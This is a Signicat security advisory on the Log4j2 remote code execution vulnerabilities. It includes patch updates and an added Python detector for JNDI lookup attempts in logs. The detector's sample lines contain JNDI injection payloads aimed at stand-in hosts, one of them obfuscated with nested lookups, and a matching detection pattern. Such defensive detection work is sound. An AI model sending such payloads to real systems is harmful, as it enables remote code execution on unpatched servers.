Apache Log4j2 RCE vulnerability (CVE-2021-44228)
Signicat is aware of and has acted on the security vulnerability in the open-source Apache Log4j2 utility (NVD - CVE-2021-44228).
Last updated on 11.02.2022 @ 14:00 CET
Signicat continues to monitor the situation closely. As previously mentioned, there have been no indications of successful attacks in Signicat or third-party provider environments.
Log4j has been upgraded to version 2.17.x on the majority of our software, and the remaining upgrades are expected to complete shortly. Please note, as stated in the previous announcement, that no attack vectors have been found for exploiting Signicat software using Log4j 2.16.x.
Any new security information related to log4j will be assessed and acted upon.
Update 22.12.2021 @ 14:45 CET
- CVE-2021-44228 - (Remote code execution) Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
- CVE-2021-45046 - (Remote code execution) Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
- CVE-2021-45105 - (Denial of service) Apache Log4j2 does not always protect from infinite recursion in lookup evaluation.
The Log4j vulnerabilities have been seen in both in-house and third-party software used in our various environments. Ease of exploitation and publicly available exploitation knowledge have increased the priority of applying patches and mitigations as soon as possible.
Third-party products have been patched with vendor patches. In-house developed software is on Log4j version 2.16 at a minimum.
Source code analysis of the attack vectors for CVE-2021-45105 (denial of service) has not revealed any vulnerable services, and therefore the upgrade to version 2.17 is not seen as necessary at this moment. However, we continue to monitor the situation closely, and software packages using Log4j version 2.17 are ready to deploy at a moment's notice, if needed.
Signicat has also kept track of the patch status of third-party service providers. The response has been swift, and no security impact has been seen on service providers' or Signicat services in the service provider environments.
No signs of compromise have been detected in Signicat or third party service provider environments.
Update 16.12.2021 @ 10:34 CET
Signicat production systems have been patched, mitigated, or were not affected. There is still work in progress for internally used software and components where we are awaiting patches and status from some vendors, but the majority are patched, mitigated, or not affected.
We have been monitoring attempts to exploit the vulnerability, and after the news from ZDNet.com we have broadened our search to also look for attempts before 2021-12-01. Our investigation shows that the earliest exploitation attempt towards Signicat systems was at 2021-12-09T23:22, with no sign of successful exploitation. We are still monitoring and following the situation.
We are currently assessing and acting on the new Apache Log4j vulnerability (CVE-2021-45046), for which the mitigations of CVE-2021-44228 were incomplete.
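The kind of search described above, finding the earliest JNDI lookup attempt in request logs, can be illustrated with a small detector. The code below is an added example and is not Signicat's tooling; the log line format, the sample lines and the source addresses are constructed for the demo. It folds nested Log4j lookups (for example a `${lower:j}` wrapped around part of the token) back into the canonical `${jndi:` form before matching, because a detector that only matches the literal string misses split-up variants that the logger itself would still resolve.

```python
import re
from datetime import datetime
from typing import List, Optional, Tuple

# Constructed sample access-log lines for the demo (hypothetical; not Signicat data).
# Format assumed here: "<ISO-8601 timestamp> <client address> <request line and user agent>".
SAMPLE_LOG_LINES = [
    '2021-12-08T10:15:02Z 203.0.113.5 GET / "Mozilla/5.0"',
    '2021-12-09T23:22:41Z 198.51.100.7 GET / "${jndi:ldap://example.invalid/a}"',
    '2021-12-10T01:03:17Z 198.51.100.9 GET /login "${${lower:j}ndi:rmi://example.invalid/b}"',
    '2021-12-10T08:44:00Z 192.0.2.4 POST /api "curl/7.79.1"',
]

_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")
# A lookup with no further lookup nested inside it.
_INNERMOST = re.compile(r"\$\{([^{}$]*)\}")
# The canonical JNDI lookup token that vulnerable Log4j 2.x versions would resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _unwrap(match: "re.Match[str]") -> str:
    """Replace one innermost non-JNDI lookup by the value the logger would substitute."""
    body = match.group(1)
    if body.lstrip().lower().startswith("jndi:"):
        return match.group(0)          # keep the token we are hunting for
    if ":-" in body:                   # ${key:-default} -> default
        return body.split(":-", 1)[1]
    if ":" in body:                    # ${lower:j}, ${upper:N} -> the wrapped text
        return body.split(":", 1)[1]
    return body


def normalize(text: str) -> str:
    """Fold nested lookups so a split-up JNDI token becomes the canonical ${jndi: form."""
    previous = None
    while previous != text:            # terminates: each pass removes one nesting level
        previous = text
        text = _INNERMOST.sub(_unwrap, text)
    return text


def find_jndi_attempts(lines: List[str]) -> List[Tuple[datetime, str, str]]:
    """Return (timestamp, source address, raw line) for each line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue
        ts, source, rest = m.groups()
        if _JNDI.search(normalize(rest)):
            hits.append((datetime.fromisoformat(ts.replace("Z", "+00:00")), source, line))
    return hits


def earliest_attempt(lines: List[str]) -> Optional[datetime]:
    """Timestamp of the first JNDI lookup attempt in the given lines, or None."""
    hits = find_jndi_attempts(lines)
    return min(h[0] for h in hits) if hits else None


if __name__ == "__main__":
    for ts, source, line in find_jndi_attempts(SAMPLE_LOG_LINES):
        print(f"{ts.isoformat()} {source}: {line}")
    print("earliest attempt:", earliest_attempt(SAMPLE_LOG_LINES))
```

On the constructed sample the detector reports two attempts and an earliest timestamp of 2021-12-09T23:22:41Z; a match only says that a lookup string reached the system, so confirming whether anything resolved it still requires checking outbound LDAP/RMI connections and the patch level of the receiving service.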
Current results of Signicat's investigation of production systems that use Log4j2:
- Signicat Enterprise SaaS products
- Signicat Enterprise monitoring system
- Signicat Enterprise hosting provider backup service
- Signicat Identity Broker
- Signicat eHerkenning Broker
- Signicat MyOwnIDP / CIAM
- MySignicat / MyConnectis
- Signicat Dokobit monitoring system
- Signicat Dokobit HSM service